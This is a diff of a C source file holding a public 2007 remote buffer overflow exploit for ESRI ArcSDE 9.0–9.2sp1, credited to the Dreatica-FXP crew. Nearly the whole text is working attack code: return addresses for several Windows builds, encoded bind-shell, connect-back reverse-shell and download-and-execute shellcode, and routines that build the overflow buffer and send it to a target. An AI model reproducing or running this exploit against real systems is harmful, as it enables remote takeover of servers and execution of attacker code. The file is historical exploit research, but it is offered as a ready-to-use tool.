-		"\x6A\x52\x46\x50\x4B\x68\x43\x6B\x70\x74\x72\x73\x4B\x70\x77\x4F"
-		"\x5A\x56\x39\x73\x6A\x61\x61\x4D\x6F\x63\x56\x43\x56\x75\x36\x4B"
-		"\x6E\x79\x6C\x7A\x4D\x6F\x39\x78\x6B\x58\x76\x6B\x4A\x78\x58\x4B"
-		"\x4D\x6B\x4D\x5A\x4B\x4B\x4C\x4A\x4A\x7A\x4A\x5A\x39\x59\x4E\x6B"
-		"\x4C\x48\x6D\x5A\x6A\x6B\x50\x4B\x5A\x5A\x4D\x4B\x4C\x4B\x44\x6B"
-		"\x6D\x6C\x30\x4A\x4B\x6B\x4C\x79\x6A\x58\x6D\x59\x66\x5A\x4B\x59"
-		"\x70\x68\x58\x4D\x49\x7A\x6E\x6A\x50\x4C\x37\x4B\x6C\x6D\x31\x6B"
-		"\x4C\x6B\x4A\x6C\x59\x4B\x6C\x6B\x51\x5A\x50\x48\x6D\x4A\x6D\x68"
-		"\x71\x4A\x4B\x79\x6C\x59\x68\x6B\x4D\x4F\x69\x6E\x35\x4B\x46\x6B"
-		"\x48\x4B\x4D\x4E\x35\x78\x70\x6B\x4B\x4A\x4B\x7A\x58\x48\x6B\x4B"
-		"\x50\x4A\x78\x4C\x59\x4A\x4C\x4A\x4B\x6A\x55\x59\x64\x4C\x36\x6B"
-		"\x47\x4E\x79\x68\x4C\x38\x4B\x7A\x75\x4B\x6D\x79\x66\x7A\x4E\x4B"
-		"\x47\x39\x65\x4A\x56\x58\x78\x4B\x4D\x7A\x6D\x4C\x36\x59\x4F\x78"
-		"\x70\x7A\x55\x39\x6C\x6E\x38\x6D\x49"
-	 },
-	{NULL , NULL }
-};
-
-
-
-int main(int argc, char **argv)
-{
-	char * remotehost=NULL, * cbip=NULL, *url=NULL;
-	char default_remotehost[]="127.0.0.1";
-	char default_cbip[]="127.0.0.1";
-	char temp1[100], temp2[100];
-	int cbport, port, itarget, sh;
-	char ss[100];
-	SOCKET s;
-	char c;	
-	int option_index=0;
-	logo();
-	WSADATA wsa;
-	WSAStartup(MAKEWORD(2,0), &wsa);
-	if(argc<2)
-	{
-		usage(argv[0]);		
-		return -1;
-	}
-
-	// set defaults
-	cbport=4444;
-	port=5151;
-	itarget=-1;
-	sh=0;
-	// ------------	
-	
-	while((c = getopt(argc, argv, "h:p:s:t:I:P:u:"))!= EOF)
-	{
-		switch (c)
-		{
-			case 'h':
-				remotehost=optarg;
-				break; 	
-			case 's':
-				sscanf(optarg, "%d", &sh);
-				sh--;
-				break;
-			case 't':
-				sscanf(optarg, "%d", &itarget);
-				itarget--;
-				break;
-			case 'p':
-				sscanf(optarg, "%d", &port);
-				break;
-			case 'P':
-				sscanf(optarg, "%d", &cbport);
-				break;
-			case 'I':				
-				cbip=optarg;
-				break; 
-			case 'u':				
-				url=optarg;
-				break; 
-			default:
-	            usage(argv[0]);
-				WSACleanup();
-			return -1;
-		}		
-	}	
-	if(remotehost == NULL) remotehost=default_remotehost;
-	if(cbip       == NULL) cbip=default_cbip;
-	if(url        == NULL) url="";
-	memset(temp1,0,sizeof(temp1));
-	memset(temp2,0,sizeof(temp2));
-	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
-	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
-	sprintf(temp2, "%d", port);
-	memset(temp1,0,sizeof(temp1));
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-	printf(" #  Port    : %s%s# \n", temp2, temp1);
-	memset(temp1,0,sizeof(temp1));	
-	memset(temp2,0,sizeof(temp2));
-	sprintf(temp2, "%s", shellcodes[sh].name );
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
-	printf(" #  Payload : %s%s# \n", temp2, temp1);	
-	if(itarget!=-1)
-	{
-		memset(temp1,0,sizeof(temp1));	
-		memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);	
-		printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);		
-	}else
-	{
-		memset(temp1,0,sizeof(temp1));	
-		memset(temp1, '\x20' , 58 - strlen("Please select target") -1);	
-		printf(" #  Target  : %s%s# \n", "Please select target", temp1);
-	}
-	if(sh==1)
-	{
-		memset(temp1,0,sizeof(temp1));	
-		memset(temp1, '\x20' , 58 - strlen(cbip) -1);	
-		printf(" #  CB IP   : %s%s# \n", cbip, temp1);
-		sprintf(temp2, "%d", cbport);
-		memset(temp1,0,sizeof(temp1));
-		memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-		printf(" #  CB port : %s%s# \n", temp2, temp1);
-	}
-	printf(" # ------------------------------------------------------------------- # \n");
-	fflush(stdout);
-	printf("   [+] Checking if server is online\n");
-	fflush(stdout);
-	s=do_connect(remotehost, port);   
-	if(s==-1)
-	{
-		printf("   [-] Server is OFFLINE\n");
-		end_logo();
-		return 0;
-	}
-	closesocket(s);
-	printf("   [+] Server is ONLINE\n");
-
-	if(itarget==-1)
-	{
-		itarget = get_version(remotehost, port);
-		if(itarget>=0)
-		{
-			printf("   [+] Target: %s%\n", targets[itarget].t);
-		}else
-		{
-			printf("   [-] Please select target\n");
-			WSACleanup();
-			end_logo();
-			return -1;			
-		}		
-	}
-	
-	unsigned char buf[10000];
-	unsigned int len;
-	memset(buf,0,sizeof(buf));
-	fflush(stdout);
-	make_buffer(buf, &len, itarget, sh, cbip, cbport, url);
-
-	printf("   [+] Attacking buffer constructed\n");
-
-	if(send_buffer(buf, len, remotehost,port)==-1)
-	{
-		printf("   [-] Cannot exploit server %s\n", remotehost);
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-
-	printf("   [+] Buffer sent\n");
-
-	if(sh==0)sprintf(ss, "   [+] Connect to %s:%d\n", remotehost, 4444);
-	if(sh==1)sprintf(ss, "   [+] The shell should arrive at %s:%d\n", cbip, cbport);
-	if(sh==2)sprintf(ss, "   [+] File is downloaded and executred\n");
-	printf("%s", ss);
-	end_logo();
-	WSACleanup();
-	return 0;
-}
-
-
-
-SOCKET do_connect (char *remotehost, int port)
-{
-   static struct hostent *host;
-   static struct sockaddr_in addr;
-   SOCKET s;	
-       host = gethostbyname(remotehost);
-       if (!host)
-       {
-           perror("[-] gethostbyname() failed");
-           return -1;
-       }
-       addr.sin_addr = *(struct in_addr*)host->h_addr;
-
-   s = socket(PF_INET, SOCK_STREAM, 0);
-   if (s == -1)
-   {
-       closesocket(s);
-       perror("socket() failed");
-       return -1;
-   }
-
-   addr.sin_port = htons(port);
-   addr.sin_family = AF_INET;
-
-	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
-   {
-       closesocket(s);     
-       return -1;
-   }
-	
-
-   return s;
-}
-
-SOCKET do_connect_async (char *remotehost, int port)
-{
-   static struct hostent *host;
-   static struct sockaddr_in addr;
-   SOCKET s;	
-       host = gethostbyname(remotehost);
-       if (!host)
-       {
-           perror("[-] gethostbyname() failed");
-           return -1;
-       }
-       addr.sin_addr = *(struct in_addr*)host->h_addr;
-
-   s = socket(PF_INET, SOCK_STREAM, 0);
-   if (s == -1)
-   {
-       closesocket(s);
-       perror("socket() failed");
-       return -1;
-   }
-
-
-    unsigned long l = 1;
-    if ( ioctlsocket( s, FIONBIO, &l ) != 0 )
-    {
-		fprintf( stderr, "Failed setting socket to non-blocking mode\n" );
-		closesocket( s );
-		return -1;
-    }
-
-
-   addr.sin_port = htons(port);
-   addr.sin_family = AF_INET;   
-
-   if ( connect( s, (sockaddr*) &addr, sizeof( sockaddr ) ) == SOCKET_ERROR )
-    {
-		int error = WSAGetLastError( );
-		if ( ( error != WSAEWOULDBLOCK ) && ( error != WSAEINPROGRESS ) )
-		{
-			fprintf( stderr, "Failed connecting to remote host, %d\n", error );
-			closesocket( s );
-			return -1;
-		}
-    }
-
-   return s;
-}
-
-
-
-
-
-
-// get arcsde version to determine target
-int get_version(char * remotehost, int port)
-{
-		// ----------------------------------------
-    	// removed due to publicity of the exploit
-		// ----------------------------------------
-	return -1;
-}
-
-
-
-
-
-
-void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh, char * cbip, int cbport, char *url)
-{
-	memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
-	*fshlength = shellcodes[sh].length;
-	if(sh==1)
-	{			
-		static struct hostent *host = gethostbyname(cbip);
-		static struct sockaddr_in addr;
-		addr.sin_addr = *(struct in_addr*)host->h_addr;		
-		fsh[111] = (addr.sin_addr.S_un.S_un_b.s_b1) ^ 0xc2;
-		fsh[112] = (addr.sin_addr.S_un.S_un_b.s_b2) ^ 0xc2;
-		fsh[113] = (addr.sin_addr.S_un.S_un_b.s_b3) ^ 0xc2;
-		fsh[114] = (addr.sin_addr.S_un.S_un_b.s_b4) ^ 0xc2;
-        
-		fsh[118] = ((cbport >> 8) & 0xff) ^ 0xc2;
-		fsh[119] = ((cbport     ) & 0xff) ^ 0xc2;
-	}
-	if(sh==2)
-	{
-		char locurl[1000];
-		memset(locurl,0,sizeof(locurl));
-		memcpy(locurl, url, strlen(url));
-		locurl[strlen(locurl)]='\x80';
-		char encoded_url[2500] ;
-		alphanumeric_encoder_thx_to_skylined(locurl, encoded_url);
-		strcat((char *)fsh, encoded_url);	
-		*fshlength += (unsigned int)strlen(encoded_url);
-	}
-}
-
-void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url)
-{
-	// prepare shellcode
-	unsigned char fsh[10000];	
-	unsigned int fshlength;
-	memset(fsh, 0, sizeof(fsh));	
-	prepare_shellcode(fsh, &fshlength, sh, cbip, cbport, url);
-	// -----------------
-
-	// make buffer
-	unsigned char * cp=buf;		
-		
-		// long buffer
-	*cp++='\x80';
-	memset(cp, '\x41', 515);
-	cp+=515;	
-
-		//replace EIP
-	*cp++ = (char)((targets[itarget].ret      ) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >>  8) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);	
-
-		// jff
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-    *cp++ = '\x90';
-
-		// copy shellcode
-	memcpy(cp, fsh, fshlength);
-	cp+=fshlength;
-    	
-		// set the length manually cause of the 0x00 bytes 
-	*len = (unsigned int)(cp-buf);
-	// -----------------
-}
-
-
-
-int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
-{	
-	SOCKET sock;
-	char str[1000];
-	int bytes;
-	char bufmax[4096];
-
-	sock = do_connect_async(remotehost, port);
-	if(sock==-1)
-	{
-		printf("   [-] Failed to connect to server\n");
-	}	
-	fd_set  fdConnect  = { 0 };
-
-	TIMEVAL stTime;
-	TIMEVAL *pstTime = NULL;
-	long dwTimeout=5000;
-	if (INFINITE != dwTimeout) 
-	{
-	    stTime.tv_sec = dwTimeout / 1000;
-	    stTime.tv_usec = dwTimeout % 1000;
-	    pstTime = &stTime;
-	}
-	if (!FD_ISSET(sock, &fdConnect))
-	FD_SET(sock, &fdConnect);
-
-	int res = select(NULL, NULL, &fdConnect, NULL, pstTime);
-    if(res==0)
-	{
-		closesocket(sock);
-		return -1;
-	}
-	if(res<0)
-	{
-		closesocket(sock);
-		return -1;
-	}
-
-	bytes = send(sock, (char *)buf, len, 0);
-	Sleep(500);
-	printf("   [+] Sent %d bytes to server\n", bytes);
-	
-	fd_set  active_set, read_set;
-
-	FD_ZERO(&active_set);
-    FD_SET(sock, &active_set);
-
-	read_set = active_set;
-    res = select(FD_SETSIZE,&read_set,NULL,NULL, pstTime);
-
-	if (res==0)
-	{
-		closesocket(sock);
-		return 1;
-	}
-
-	if ( res<0 ) {
-    	closesocket(sock);
-		return -1;
-    }
-
-    for (int i=0; i> 4;
-    B = (input & 0x0f);
-    F = B;
-    i = rand() % ((int)strlen(valid_chars));
-    while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
-    E = valid_chars[i] >> 4;
-    D = (A^E);
-    i = rand() % ((int)strlen(valid_chars));
-    while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
-    C = valid_chars[i] >> 4;
-    sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
-    encoded[strlen(encoded)]=temp[0];
-	encoded[strlen(encoded)]=temp[1];
-  }
-  encoded[strlen(encoded)]='A';
-  return 0;
-}
-
-
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
-	static char *next = NULL;
-	if (optind == 0)
-		next = NULL;
-
-	optarg = NULL;
-
-	if (next == NULL || *next == '\0')
-	{
-		if (optind == 0)
-			optind++;
-
-		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
-		{
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		if (strcmp(argv[optind], "--") == 0)
-		{
-			optind++;
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		next = argv[optind];
-		next++;		// skip past -
-		optind++;
-	}
-
-	char c = *next++;
-	char *cp = strchr(optstring, c);
-
-	if (cp == NULL || c == ':')
-		return '?';
-
-	cp++;
-	if (*cp == ':')
-	{
-		if (*next != '\0')
-		{
-			optarg = next;
-			next = NULL;
-		}
-		else if (optind < argc)
-		{
-			optarg = argv[optind];
-			optind++;
-		}
-		else
-		{
-			return '?';
-		}
-	}
-
-	return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-void usage(char * s)
-{	
-	printf("   Usage : %s -h  -p  -s  -t  -I  -P  -u \n", s);
-	printf("   Arguments:\n");
-	printf("      -h      host to connect\n");
-	printf("      -p      port (default: 5151)\n");
-	printf("      -s   select shellcode (default: 1)\n");
-	printf("      -t    target to attack\n");
-	printf("      -I        reverse IP for the connect-back shellcode\n");
-	printf("      -P      reverse port for the connect-back shellcode\n");
-	printf("      -u       url for executable for DAX shellcode\n\n");
-	printf("    Shellcodes:\n");
-	for(int i=0; shellcodes[i].name!=0;i++)
-	{
-		printf("       %d. %s\n",i+1,shellcodes[i].name);				
-	}	
-	printf("\n");
-	printf("    Targets:\n");
-	for(int j=0; targets[j].t!=0;j++)
-	{
-		printf("       %d. %s\n",j+1,targets[j].t);
-	}		
-	printf("\n");
-	end_logo();	
-}
-
-void logo()
-{
-	printf("\n\n");
-	printf(" ####################################################################### \n");	
-	printf(" #     ____                 __  _                  ______  __    _____ #\n");
-	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
-	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
-	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
-	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
-	printf(" #                                 crew                                #\n");
-	printf(" ####################################################################### \n");	
-	printf(" #  Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow          # \n");
-	printf(" #  Solution: ESRI ArcSDE 9.2 sp2 is invulnerable                      # \n");
-	printf(" #  Author  : Heretic2 (heretic2x@gmail.com                            # \n");
-	printf(" #  THANKS  : iDefense, Zero-tolerance, Metasploit project and anghell # \n");
-	printf(" #  Research: iDefense                                                 # \n");
-	printf(" #  Version : 1.0 Public Release                                       # \n");
-	printf(" #  System  : Windows ALL                                              # \n");
-	printf(" #  Date    : 26.06.2007                                               # \n");
-	printf(" # ------------------------------------------------------------------- # \n");
-}
-
-void end_logo()
-{
-	printf(" # ------------------------------------------------------------------- # \n");
-	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
-	printf(" ####################################################################### \n\n");
-}
-
-// milw0rm.com [2007-07-03]
+/* Dreatica-FXP crew
+* 
+* ----------------------------------------
+* Target         : ESRI ArcSDE 9.0 - 9.2sp1 
+* Site           : http://www.esri.com
+* Found by       : iDefense, http://labs.idefense.com/intelligence/vulnerabilities/
+* ----------------------------------------
+* Exploit        : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow exploit
+* Exploit date   : 26.06.2007
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS             : Windows ALL 
+* Crew           : Dreatica-FXP
+* ----------------------------------------
+* Info           :   Trivially exploitable stack overflow vulnerability: if we send more than 516 bytes to 
+*                  server, we can overwrite EIP. After the EIP gets overwritten we can see that the ESP 
+*                  points to the next bytes of buffer after EIP, so we simply write shellcode at 520 byte.
+*                  The server allows any type of buffer even with the 0x00 bytes, so have fun!
+*                  For use universal RET's you need to find the ArcSDE version (this is not a trivial job :P) 
+*
+*                    Seems that the earlier versions are also vulnerable. To protect the server against that
+*                  vulnerability you need to install ArcSDE 9.2sp2.
+* ----------------------------------------
+* Compiling      :
+*  To compile this exploit you need:
+*    1. Windows C/C++ compiler   
+*    2. WinSock 2
+* ----------------------------------------
+* Thanks to      :
+*       1. iDefense                    ( http://labs.idefense.com/intelligence/vulnerabilities/ )
+*       2. The Metasploit project      ( http://metasploit.com                                  ) 
+*       3. ALPHA 2: Zero-tolerance     (                         ) 
+*       4. anghell at Dreatica-FXP     (                                                        )
+*       5. Dreatica-FXP crew           ( http://www.dreatica.cl                                 )
+* ----------------------------------------
+* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be 
+* responsible for any damage, caused by that code.
+************************************************************************************
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#pragma comment(lib,"ws2_32")
+
+
+void usage(char * s);
+void logo();
+void end_logo();
+void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url);
+void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url);
+int get_version(char * remotehost, int port);
+int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
+SOCKET do_connect (char *remotehost, int port);
+SOCKET do_connect_async (char *remotehost, int port);
+int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
+
+static long timeout = 2000 ; // 2 sec
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char	*optarg;		// global argument pointer
+int		optind = 0, opterr; 	// global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+
+struct _target{
+	const char *t ;
+	unsigned long ret ;	
+} targets[]=
+		{
+			{"UNIV: AcrSDE 9.0 [sdesqlsrvr90.dll] ( MSSQL )",  0x1015c357 },// jmp esp
+			{"UNIV: AcrSDE 9.1 [sdesqlsrvr91.dll] ( MSSQL )",  0x1015e3e7 },// jmp esp
+			{"UNIV: AcrSDE 9.2 [sdesqlsrvr92.dll] ( MSSQL )",  0x1008d742 },// jmp esp			
+			{"Windows XP   SP0 RUSSIAN [shell32.dll]",         0x77a96758 },// jmp esp
+			{"Windows XP   SP1 RUSSIAN [advapi32.dll]",        0x77e1d9d3 },// jmp esp
+			{"Windows XP   SP2 RUSSIAN [shell32.dll]",         0x7d16817f },// jmp esp
+			{"Windows XP   SP2 ENGLISH [ole32.dll]",           0x77548952 },// jmp esp
+			{"Windows XP   SP2 DUTCH   [ntdll.dll]",           0x7c941eed },// jmp esp
+			{"Windows 2003 SP0 ENGLISH [shell32.dll]",         0x77add723 },// jmp esp
+			{"Debug / DoS",                                    0x42424242 },
+			{NULL,										       0x00000000 }
+		};
+
+
+struct {
+	const char * name;
+	int length;
+	char * shellcode;	
+}shellcodes[]={ 	
+	 {"Bindshell, port 4444   [ args: none ]", 696, 
+		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
+		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
+		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
+		"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32"
+		"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62"
+		"\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71"
+		"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c"
+		"\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47"
+		"\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35"
+		"\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c"
+		"\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a"
+		"\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a"
+		"\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64"
+		"\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34"
+		"\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50"
+		"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64"
+		"\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31"
+		"\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69"
+		"\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30"
+		"\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78"
+		"\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f"
+		"\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73"
+		"\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e"
+		"\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62"
+		"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71"
+		"\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65"
+		"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32"
+		"\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e"
+		"\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69"
+		"\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79"
+		"\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d"
+		"\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49"
+		"\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70"
+		"\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45"
+		"\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36"
+		"\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32"
+		"\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e"
+		"\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50"
+		"\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32"
+		"\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a"
+		"\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48"
+		"\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30"
+		"\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39"
+		"\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b"
+		"\x4f\x6a\x76\x6b\x4f\x78\x50\x42"
+	 },
+
+	  
+	 {"ReverseShell           [ args: -I  -P  ]", 316,
+		"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
+		"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
+		"\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
+		"\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
+		"\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
+		"\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
+		"\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
+		"\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
+		"\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
+		"\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69"
+		"\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B"
+		"\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93"
+		"\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D"
+		"\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE"
+		"\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83"
+		"\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1"
+		"\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49"
+		"\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01"
+		"\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7"
+		"\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68"
+		"\xA2\x25\xBB\x04\xBB"
+	},
+	 {"Download and execute   [ args: -u  ]", 729,
+		/* win32_download_exec - http://metasploit.com */
+		/* encoded by "ALPHA 2: Zero-tolerance.  */
+		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+		"\x49\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51"
+		"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
+		"\x75\x4A\x49\x58\x6B\x36\x70\x71\x4A\x33\x7A\x76\x53\x59\x59\x71"
+		"\x76\x38\x39\x57\x4C\x35\x51\x6B\x30\x74\x74\x74\x4A\x6E\x79\x39"
+		"\x72\x7A\x5A\x78\x6B\x36\x65\x4D\x38\x7A\x4B\x4B\x4F\x4B\x4F\x4B"
+		"\x4F\x54\x30\x50\x4C\x4E\x79\x6C\x59\x5A\x39\x4F\x33\x79\x6D\x55"
+		"\x68\x6C\x69\x5A\x39\x4E\x79\x4A\x39\x34\x52\x58\x59\x6E\x75\x54"
+		"\x52\x4B\x59\x6D\x55\x36\x54\x45\x42\x7A\x79\x6F\x61\x56\x72\x53"
+		"\x71\x34\x52\x5A\x4A\x6D\x75\x76\x72\x4A\x4D\x4E\x67\x4D\x31\x6F"
+		"\x6A\x72\x4A\x36\x72\x6B\x57\x4E\x59\x4F\x6A\x33\x52\x76\x72\x6E"
+		"\x37\x4C\x4D\x6F\x5A\x74\x34\x7A\x6F\x48\x4E\x79\x58\x55\x42\x4D"
+		"\x76\x4C\x5A\x73\x52\x74\x52\x32\x4B\x6B\x43\x4C\x57\x49\x50\x52"
+		"\x4A\x75\x6F\x7A\x4D\x4A\x31\x69\x50\x59\x56\x54\x5A\x51\x4E\x4F"
+		"\x6D\x69\x4C\x33\x4B\x64\x30\x4B\x70\x6F\x36\x6B\x77\x54\x52\x73"
+		"\x64\x62\x32\x79\x4F\x4D\x6D\x6E\x7A\x70\x5A\x73\x78\x70\x78\x4F"
+		"\x6A\x62\x78\x6D\x7A\x50\x50\x4B\x4F\x75\x42\x4A\x31\x75\x42\x4B"
+		"\x6F\x6F\x75\x4D\x4A\x61\x4A\x52\x78\x52\x58\x4D\x4B\x6E\x7A\x50"
